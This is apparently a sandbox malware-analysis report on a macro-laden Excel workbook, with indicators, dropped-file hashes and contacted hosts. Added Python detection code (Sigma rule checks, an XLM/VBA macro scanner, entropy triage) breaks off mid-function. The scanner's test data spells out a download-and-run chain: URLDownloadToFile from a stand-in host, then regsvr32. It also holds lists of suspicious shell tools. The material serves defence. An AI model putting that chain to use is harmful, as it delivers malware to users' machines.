Analysis Report sample20210111-01.xlsm
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: BlueMashroom DLL Load | Author: Florian Roth |
Sigma detected: Microsoft Office Product Spawning Windows Shell | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
Sigma detected: Regsvr32 Anomaly | Author: Florian Roth |
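The two process-tree rules above ("Microsoft Office Product Spawning Windows Shell" and "Regsvr32 Anomaly") match on parent/child process relationships and command lines, not on the workbook itself. The Python below is an added illustration, not code from this report or from the Sigma repository: it evaluates simplified versions of those two rules over a constructed list of Sysmon-style process-creation events. The event records, the `ProcEvent` and `evaluate` names, and the shortened parent/child selection lists are assumptions made for the example; the published rules carry longer lists and are normally evaluated by a SIEM's Sigma backend.

```python
"""Simplified evaluation of two Sigma process-creation rules.

Added example: the rule selections are shortened from the public rules and the
events are constructed, so this is neither the Sigma engine nor data from the report.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Subsets (assumption) of the selection lists in the public Sigma rules.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "schtasks.exe",
                  "wmic.exe", "msiexec.exe", "hh.exe", "certutil.exe", "bitsadmin.exe"}
NON_DLL_SUFFIXES = (".jpg", ".png", ".gif", ".txt", ".tmp", ".bin", ".dat")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawning_shell(ev: ProcEvent) -> bool:
    """'Microsoft Office Product Spawning Windows Shell' (simplified)."""
    return basename(ev.parent_image) in OFFICE_PARENTS and basename(ev.image) in SHELL_CHILDREN


def regsvr32_anomaly(ev: ProcEvent) -> bool:
    """'Regsvr32 Anomaly' (simplified): regsvr32 pointed at a URL or scriptlet,
    registering a file that is not a DLL, or launched from an Office application."""
    if basename(ev.image) != "regsvr32.exe":
        return False
    cl = ev.command_line.lower().rstrip().rstrip('"')
    return ("/i:http" in cl or "/i:ftp" in cl or "scrobj.dll" in cl
            or cl.endswith(NON_DLL_SUFFIXES)
            or basename(ev.parent_image) in OFFICE_PARENTS)


RULES = {
    "Microsoft Office Product Spawning Windows Shell": office_spawning_shell,
    "Regsvr32 Anomaly": regsvr32_anomaly,
}


def evaluate(events):
    """Return {rule title: [indices of matching events]} for every rule that fired."""
    hits = {}
    for idx, ev in enumerate(events):
        for title, rule in RULES.items():
            if rule(ev):
                hits.setdefault(title, []).append(idx)
    return hits


# Constructed events (not taken from the report): an Office-driven chain plus benign noise.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", '"EXCEL.EXE"'),
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              r"C:\Windows\System32\cmd.exe",
              r'cmd /c regsvr32 /s C:\Users\Public\p.jpg'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32 /s C:\Users\Public\p.jpg'),
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\regsvr32.exe",
              r'regsvr32 /s C:\Windows\System32\msxml6.dll'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd"),
]

if __name__ == "__main__":
    for title, idxs in evaluate(SAMPLE_EVENTS).items():
        print(f"{title}: events {idxs}")
```

Run against the constructed events, the Office rule fires on the EXCEL.EXE to cmd.exe step and the regsvr32 rule on the cmd.exe to regsvr32.exe step that registers a .jpg; the service-launched regsvr32 registering a real DLL stays quiet. Matching on the lower-cased basename rather than the full path is what keeps the rules robust against a relocated Office install or a copied binary.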
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for domain / URL |
Source: | Virustotal |
Multi AV Scanner detection for submitted file |
Source: | Virustotal |
Source: | ReversingLabs |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: | (2 entries) |
Source: | IP Address: | (2 entries) |
Source: | ASN Name: |
Source: | File created: |
Source: | String found in binary or memory: | (2 entries) |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | (36 entries) |
Source: | Network traffic detected: | (6 entries) |
Source: | File created: | (dropped file) |
System Summary: |
---|
Document contains an embedded VBA macro which may execute processes |
Source: | OLE, VBA macro: | (2 entries) |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: | (4 entries) |
Source: | OLE, VBA macro line: |
Source: | OLE, VBA macro: |
Source: | OLE indicator, VBA macros: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: |
Source: | Mutant created: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | File read: | (2 entries) |
Source: | Virustotal: |
Source: | ReversingLabs: |
Source: | Process created: | (7 entries) |
Source: | Key value queried: |
Source: | Automated click: | (2 entries) |
Source: | Window detected: |
Source: | Initial sample: | (2 entries) |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Process created: |
Source: | Registry key monitored for changes: |
Source: | Process information set: | (57 entries) |
Source: | Thread sleep time: |
Source: | Process information queried: |
Source: | Process created: |
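Both macro signatures in this section come from static inspection of the workbook: the VBA project is scanned for calls that can start a process, and any Excel 4.0 macro sheet is scanned for formulas such as EXEC, CALL and REGISTER. The keyword list extracted from Module1 later in this report (Run, Split, Replace, Chr, Randomize) is consistent with VBA that assembles a name at run time and hands execution to an XLM macro through Run; that is an inference from the keywords, since the light report does not include the macro text. The scanner below is an added example, not Joe Sandbox's signature code and not the sample's macros: the formulas, defined name and VBA module it scans are constructed for the test, and the indicator lists and the decision rule in `signatures()` are assumptions (olevba and XLMMacroDeobfuscator carry far fuller lists).

```python
"""Static indicators for Excel 4.0 (XLM) macro sheets and VBA modules.

Added example, not Joe Sandbox's signature code. The indicator lists are
deliberately short; olevba and XLMMacroDeobfuscator maintain the real ones.
"""
import re

# XLM functions and patterns that rarely belong in a legitimate sheet (assumption: subset).
XLM_INDICATORS = {
    "EXEC": r"\bEXEC\s*\(",
    "CALL": r"\bCALL\s*\(",
    "REGISTER": r"\bREGISTER(?:\.ID)?\s*\(",
    "URLDownloadToFile": r"URLDownloadToFile[AW]?",
    "FORMULA": r"\bFORMULA(?:\.FILL|\.ARRAY)?\s*\(",           # run-time formula writing
    "CHAR-obfuscation": r"(?:CHAR\s*\(\s*\d+\s*\)\s*&\s*){3,}",  # strings built from char codes
}

# VBA calls that start processes or build strings at run time (assumption: subset).
VBA_INDICATORS = {
    "Shell": r"\bShell\s*\(",
    "Run": r"\bRun\b",                       # Application.Run hands control to an XLM macro
    "CreateObject": r"\bCreateObject\s*\(",
    "WScript.Shell": r"WScript\.Shell",
    "URLDownloadToFile": r"URLDownloadToFile",
    "AutoExec": r"\b(?:Auto_?Open|Workbook_Open|Document_Open)\b",
    "string-building": r"\b(?:Chr|ChrW|Replace|Split|StrReverse)\s*\(",
}

PROCESS_XLM = {"EXEC", "CALL", "REGISTER", "URLDownloadToFile"}
PROCESS_VBA = {"Shell", "Run", "CreateObject", "WScript.Shell"}


def scan_xlm(cells, defined_names):
    """cells: iterable of (sheet, cell, formula); defined_names: {name: target}.
    Returns [(location, indicator), ...] in sheet order, then auto-exec names."""
    findings = []
    for sheet, cell, formula in cells:
        for name, pat in XLM_INDICATORS.items():
            if re.search(pat, formula, re.IGNORECASE):
                findings.append((f"{sheet}!{cell}", name))
    for name, target in defined_names.items():
        if name.lower().endswith("auto_open"):   # Auto_Open or _xlnm.Auto_Open
            findings.append((f"name:{name}->{target}", "Auto_Open"))
    return findings


def scan_vba(source):
    """Sorted list of VBA indicator names present in the module text."""
    return sorted(name for name, pat in VBA_INDICATORS.items()
                  if re.search(pat, source, re.IGNORECASE))


def signatures(xlm_findings, vba_findings):
    """Map findings onto the two report signatures (assumed decision rule)."""
    return {
        "Found Excel 4.0 Macro with suspicious formulas":
            any(ind in PROCESS_XLM for _, ind in xlm_findings),
        "Document contains an embedded VBA macro which may execute processes":
            any(ind in PROCESS_VBA for ind in vba_findings),
    }


# Constructed inputs; not the sample's macro sheet or module.
SAMPLE_CELLS = [
    ("Macro1", "A1", '=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
                     '"http://example.test/p.jpg","C:\\Users\\Public\\p.jpg",0,0)'),
    ("Macro1", "A2", '=EXEC("regsvr32 /s C:\\Users\\Public\\p.jpg")'),
    ("Macro1", "A3", "=FORMULA(CHAR(61)&CHAR(72)&CHAR(65)&CHAR(76)&CHAR(84)&CHAR(40)&CHAR(41),B1)"),
    ("Macro1", "A4", "=HALT()"),
    ("Sheet1", "C7", "=SUM(A1:A6)"),
]
SAMPLE_NAMES = {"Auto_Open": "Macro1!$A$1"}
SAMPLE_VBA = '''Attribute VB_Name = "Module1"
Private Sub Workbook_Open()
    Dim parts() As String: parts = Split(Sheets(1).Range("A1").Value, "!")
    Application.Run Replace(parts(0), "#", Chr(95)) & Sheets(1).Name
End Sub
'''

if __name__ == "__main__":
    xlm = scan_xlm(SAMPLE_CELLS, SAMPLE_NAMES)
    vba = scan_vba(SAMPLE_VBA)
    for loc, ind in xlm:
        print(f"XLM  {loc}: {ind}")
    print("VBA :", ", ".join(vba))
    for sig, hit in signatures(xlm, vba).items():
        print(f"{'HIT ' if hit else '    '} {sig}")
```

The CHAR-concatenation pattern is there because XLM droppers commonly write their real formulas into cells at run time with FORMULA, assembling them from character codes so that no EXEC or CALL string is visible to a static scan; the FORMULA and CHAR indicators alone do not trip the process signature here, but they are the cue to emulate the sheet rather than trust the static result.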
Mitre Att&ck Matrix |
---|
Tactic | Techniques with signature hits (count) |
---|---|
Execution | Scripting (22), Exploitation for Client Execution (23) |
Privilege Escalation | Process Injection (11) |
Defense Evasion | Masquerading (1), Virtualization/Sandbox Evasion (1), Process Injection (11), Scripting (22), Regsvr32 (1) |
Discovery | Query Registry (1), Virtualization/Sandbox Evasion (1), Process Discovery (1), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (2) |
Command and Control | Encrypted Channel (2), Ingress Tool Transfer (1), Non-Application Layer Protocol (1), Application Layer Protocol (2) |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
sample20210111-01.xlsm | 27% | Virustotal | |
sample20210111-01.xlsm | 8% | Metadefender | |
sample20210111-01.xlsm | 22% | ReversingLabs | Script-Macro.Trojan.Wacatac |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
 | 0% | Virustotal | |
 | 6% | Virustotal | |
URLs |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
(32 URLs) | 0% | URL Reputation | safe |
(1 URL) | 0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cdn.digicertcdn.com | 104.18.10.39 | true | false | | unknown |
ppdb-legacy.man1lamongan.com | 199.59.242.150 | true | true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
(10 URLs) | | false | | high |
(7 URLs) | | false | | unknown |
(2 URLs) | | false | | low |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
199.59.242.150 | unknown | United States | 395082 | BODIS-NJUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 338158 |
Start date: | 11.01.2021 |
Start time: | 18:27:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 38s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | sample20210111-01.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal88.expl.evad.winXLSM@7/19@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
18:28:06 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Samples | Detection |
---|---|---|
199.59.242.150 | 19 samples | malicious (all 19) |
Domains |
---|
Match | Associated Samples | Detection |
---|---|---|
cdn.digicertcdn.com | 20 samples | malicious (all 20) |
ASN |
---|
Match | Associated Samples | Detection |
---|---|---|
BODIS-NJUS | 20 samples | malicious (all 20) |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | dropped |
Size (bytes): | 914 |
Entropy (8bit): | 7.367371959019618 |
Encrypted: | false |
SSDEEP: | 24:c0oGlGm7qGlGd7SK1tcudP5M/C0VQYyL4R3fum:+JnJ17tcudRMq6QsF |
MD5: | E4A68AC854AC5242460AFD72481B2A44 |
SHA1: | DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 |
SHA-256: | CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F |
SHA-512: | 5622207E1BA285F172756F6019AF92AC808ED63286E24DFECC1E79873FB5D140F1CEB7133F2476E89A5F75F711F9813A9FBB8FD5287F64ADFDCC53B864F9BDC5 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.0862995200743666 |
Encrypted: | false |
SSDEEP: | 6:kKd/zLDKVIbjcalgRAOAUSW0zeEpV1Ew1OXISMlcV/:RLutWOxSW0zeYrsMlU/ |
MD5: | 0FCAC07AEFF591E1FF36221FC15993B5 |
SHA1: | 6AF4105DB3149F0580D3E8347CE34161EB9D1263 |
SHA-256: | 866EEAAF51EA184F5C6F6C26755C5F44D98B78AC37FE334267E6C41EEEBDFA1A |
SHA-512: | A4AB264BF66FC9F69430B213CBF09BDD919777E0DEC8820AA77F06AF8D3A60645C8B9C39355176C97B7B8FDCFCD40F6F28C27599B31B59533925FC1D8E1F2970 |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.117051994467751 |
Encrypted: | false |
SSDEEP: | 6:kKvVwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:nVykPlE99SNxAhUegeT2 |
MD5: | 4FA401A194E5284B0318ED59396335C5 |
SHA1: | 82F0AEA431C0AC660303423D44DEC0F299C8D1E4 |
SHA-256: | 6942E5AA884492FA35293A7A7811E1228C463F90A67A883F83AB9FA64B2D07F8 |
SHA-512: | D536E1FEDB6B5392CAD3B8341B10A2B875D6945C499BA76F09486461FD7D6037BCF0CE2B74A392F92B6458AEA041914D4DA52C6DE0A07340C67EEA415EA4A97F |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 1408 |
Entropy (8bit): | 2.270567557934206 |
Encrypted: | false |
SSDEEP: | 12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB |
MD5: | 40550DC2F9D56285FA529159B8F2C6A5 |
SHA1: | DD81D41D283D2881BEC77E00D773C7E8C0744DA3 |
SHA-256: | DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1 |
SHA-512: | FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 2653 |
Entropy (8bit): | 7.818766151665501 |
Encrypted: | false |
SSDEEP: | 48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x |
MD5: | 30D3FFA1E30B519FD9B1B839CC65C7BE |
SHA1: | 1EB0F0E160FF7440223A7FE46F08B503F03D3AFB |
SHA-256: | 89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC |
SHA-512: | 88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50 |
Malicious: | false |
Reputation: | low |
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | modified |
Size (bytes): | 16312 |
Entropy (8bit): | 3.7163402135276207 |
Encrypted: | false |
SSDEEP: | 96:4KbBakNZESI/fQ5QXI4izw+HbngICZgpYT1uPoGl9uyEYcbkMIbFY7UGQIiTOB1A:4LBKzFCEuhTlyZVaPYVaJa5GG |
MD5: | 0FDF227B92A2ECDFE906E27D6C032F8A |
SHA1: | 0EB3004A2A4905A6DEAB1996B86B4328860EE777 |
SHA-256: | 11F89CB104E776E2E1077133CBBE0C568E3F4F870157534C1F489216E9328093 |
SHA-512: | B80868BD0B49AC51AFA4A3FA0BC4B0D23656AFADE3C46EB9C72224DD787F1CF7E1215563E021F59449CA97D46FF1540FC9A1F693D77783B303935DA3FCE0E061 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 56572 |
Entropy (8bit): | 7.850619347326348 |
Encrypted: | false |
SSDEEP: | 768:hnSWNrAli8zJjXl9e4JpKmyslLBti3rng54DpyNzSHOdFoKqbLNFq9z:hXUl/i434o9og540NzgO/ObLNFq9z |
MD5: | DEC0E4FC83D4C848B110DB20629C98DC |
SHA1: | 9A7EC2860D75C9984F6713A08DA3085EF6BC91AE |
SHA-256: | FB2A27AF526DF0402AA3712EC3F0E20C9704DAC783BC737C4FF46D3629D76812 |
SHA-512: | 1F430E39C5AF36D0CA40E33828EF4002D4BB6C39A891027F3F489E8ED64A72914F33EE09BD56746DA162F762121113C13CA5FE2C55F7A342DD8127ED4CB098A9 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 1392 |
Entropy (8bit): | 3.142934598289609 |
Encrypted: | false |
SSDEEP: | 24:pll/r8suFosnbeTl/3vXkJXHIUbcW1IP/dOZ5GjXO/CUnHBFzE:pll/QFZbkXWGlON/xBFY |
MD5: | 91CFCC4A1A09DB77E653BB2E13F9B179 |
SHA1: | 165023666DAE5D631E04A9220442E401075DB3D1 |
SHA-256: | BA228004FCDF193E308AB0545750EE259A1D20999071DF01CD8B4B3964256422 |
SHA-512: | 2FDE452FAFAB930FE87B4E633057B63D4F21FD34634D8153423467102CAB76A939694316098E5AAECFE05AAEC90632FDF5EF79E21647AF5C70162EC0693A9118 |
Malicious: | false |
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206769656577553 |
Encrypted: | false |
SSDEEP: | 1536:cG4LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:c5NNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | C5E9F5703FA359DD72FBB85355945491 |
SHA1: | 21549B782C4424D9100D4477D34847842528426E |
SHA-256: | 98870A08EBB24B9C458C0ECE3F7CDDF3089A26C83403BF653B00ABBF244FFA95 |
SHA-512: | 0AC6C3C8EF98C31CCA647277EAB1C28565ACA4F0BB02A7BFBC040594DC327D6D7BD37D601860D47823EDA5FCC11354C5C67A88EE1C2890625DA2F330DB9D7126 |
Malicious: | false |
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Process: | C:\Windows\System32\DWWIN.EXE |
Category: | dropped |
Size (bytes): | 3110 |
Entropy (8bit): | 3.6796097788243274 |
Encrypted: | false |
SSDEEP: | 96:Shz4tU6o7VxBt3uhhgHPe40PAn5xp38MkSMY3:Wl7LBNuhhgG45nv58MlMI |
MD5: | 9951D43E6E3E0625775F9777E865C7B5 |
SHA1: | 6D551E14B691ED0A9383729CDD21BE086CD055AA |
SHA-256: | 2E5E8A5064AA4428F1BD0F83AAB230604EBBC4FCAC184BDCDC22006D2E74B86D |
SHA-512: | 8CDF8C3FE9AA9116F6621F44429268639679D8A2A5784DC0EA7AE172235742C67671188DF6786256B773A65A36E738A15FD11B11BF3F4529CAD2ED8DFD38BB7D |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | modified |
Size (bytes): | 51613 |
Entropy (8bit): | 7.823714360059984 |
Encrypted: | false |
SSDEEP: | 768:UAK3YYc0e76UlwEBwuOASEvIrC98rbqFqcO+hxOVPZKp42A205LEdT/C9WNJVTQY:d976UmE+uhBQrC98PGZHUnN5LaLTQDi9 |
MD5: | 138F4E0E9934BE4DA0426CB5321F0D7F |
SHA1: | 84070B3A221BFB5C0DE40209E639669583CEC8C3 |
SHA-256: | 1D254C6FD6801C024975A8EEF3575FE869C3AC88AF910C27E24DCA3957243217 |
SHA-512: | 5E69E147D8439A637A11C9B2481E0778E65DA67BF1E059FB038266990E3B0C608E2DC8BD3BFE4D187191F8D54C138663EF215073FF872A9A68255091DC7C35A9 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.48075162575188 |
Encrypted: | false |
SSDEEP: | 12:85Q/k2kcLgXg/XAlCPCHaXtB8XzB/DhiUBEX+WnicvbsaRbDtZ3YilMMEpxRljKA:85dDK/XTd6jhhnEYehtDv3qNArNru/ |
MD5: | B339C286696BE14A0BFB8FB5E272DD38 |
SHA1: | F3CC42F0CD4D791395DF1E3D43223997C63E4D41 |
SHA-256: | A352E71022A6431154D763D66924E48A7411E8F285071E107CAA18D18EAACDFB |
SHA-512: | 85695DE99B0CC82045A566D3BE60B0DC43FE56ECE3B080992384C3DF51220EDEEDFFEA15E51ADEBA897996E1AE444C9A8E5FE34EA9512990A2D5B0594959B1D0 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 106 |
Entropy (8bit): | 4.288085753919832 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWdxUNIVUYOhVdUNIVUYmxWdxUNIVUYv:djuSL1WLeSLC |
MD5: | 3A4CD3A9401D75DF179FD5850F863649 |
SHA1: | 1036B9ABFAF918FB96990DA3DC6350DE5ADC5EAB |
SHA-256: | 6A59F34635BEEEC2999D038D85914250458F714CB546BD29FCFA3CCA1B0E73EF |
SHA-512: | 31AB0EE07F659FA4EAD5608CCF3C8E772918F24400EE013FE83838D8106BFDE4ED823B91D2C4464B108EB37F2FB15C71E9CB0EBC7AB3A2EFC469C253136D17D4 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 2108 |
Entropy (8bit): | 4.5041154003832595 |
Encrypted: | false |
SSDEEP: | 48:8Vos/XT0jFxEllGxVl1NAQh2Vos/XT0jFxEllGxVl1NAQ/:8ys/XojFxjLNAQh2ys/XojFxjLNAQ/ |
MD5: | 32B7E994BF13801BEBBC3697536E86AD |
SHA1: | 0BF3648CA3A0DF2E5FF3FF1A57F3E20394314242 |
SHA-256: | 3FC1222BC12CBE95C2EFC8E5E43754912AAF46E37B1D17541FA2011FAA74F613 |
SHA-512: | 75F0D7763F12045792F8A68FF5DA3E40346814F53F7CCE1CD8EB11A0857C922A2156629B2BABA3FC8C57754DCB02596929248A9313E40F91497C0266E3C66AA9 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 56539 |
Entropy (8bit): | 7.850377009214 |
Encrypted: | false |
SSDEEP: | 1536:hXUl/i43FH4c93BUJn5r3i7ct2ObLNFqFWf:hO/dthFIdS7BO/AWf |
MD5: | 8A3A81530F27C8EA5D3597C53C57E6DE |
SHA1: | 9B7503B11FD8F95656380A3DC6B3056C8F07B7AA |
SHA-256: | 4FF01EF2F667E67A0D88688505BD1B86BA3C89F90E792DB92A73BC4D15809EBC |
SHA-512: | E271FA1D22EA3AD8FA29F73D51EDC852F6EEC7C9E9992D12351AB58E59BF9AE0F1F09B2DDBA5FAD6063DE1368B4BDEB30423A0543E9D94EFF01EFB122329C455 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
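The entries above identify each dropped file by size, 8-bit entropy and four hashes, and mark the one file whose entropy is close to 8 bits per byte as encrypted. The Python below is an added example, not Joe Sandbox code: it computes the same fields for a blob of bytes so an artifact recovered from a host can be checked against a report like this one, and applies the same kind of entropy flag. The 7.99 threshold is an assumption read off this report (7.9948 is marked encrypted, 7.85 is not); the report's actual cut-off is not documented here. The input bytes are constructed, and the `triage` and `matches_report` names are the example's own.

```python
"""Hashes and 8-bit entropy for dropped-file triage.

Added example, not Joe Sandbox code. The bytes below are constructed; the
'encrypted' threshold is an assumption read off this report's entries.
"""
import hashlib
import math

ENCRYPTED_THRESHOLD = 7.99   # assumption: 7.9948 is flagged in the report, 7.85 is not


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0); empty input scores 0.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
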